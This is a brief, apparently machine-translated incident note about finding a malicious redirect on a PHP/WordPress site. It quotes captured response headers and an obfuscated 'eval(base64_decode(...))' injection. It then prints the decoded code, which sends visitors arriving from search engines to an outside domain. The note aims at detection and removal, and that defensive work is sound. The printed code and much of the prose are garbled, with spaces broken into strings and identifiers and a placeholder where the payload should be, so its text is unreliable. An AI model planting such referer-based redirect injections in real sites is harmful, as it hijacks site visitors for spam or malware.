Base64_decode malicious jump detection and removal

Today, a customer's machine encounters a malicious jump to the page. First, capture packets to track the location where the code is loaded and return the information that is captured .. The homepage is so evil. X-Powered-By: PHP/5.3.14 Vary: Accept-Encoding, Cookie, User-Agent Cache-Control: max-age = 3, must-revalidate WP-Super-Cache: served supercache file from PHP location: http://www.bkjia.com/ ? Jfdsfsd9 Thanks: Welcome to our website! It can be found that, based on the packet capture information, it is determined that the JS and other code are redirected Based on the routes. No exception is found .. Then suspicious code is found in a file .. Eval (base64_decode ('commandid encoding'); after decryption, $ r = explode ('#', 'Baidu. com # 360.cn# google # qq.com # soso.com # yahoo.com # sogo U.com # tom.com # bing.com '); foreach ($ r as $ v) {if (stristr (@ $ _ SERVER ['HTTP _ referer'], $ v )) header ('location: http: // www.2cto.com /? Xxxjfd9');} so evil... No need to say anything... However, this method is still rare .. It also increases the difficulty of scanning and killing... You need to analyze it with patience.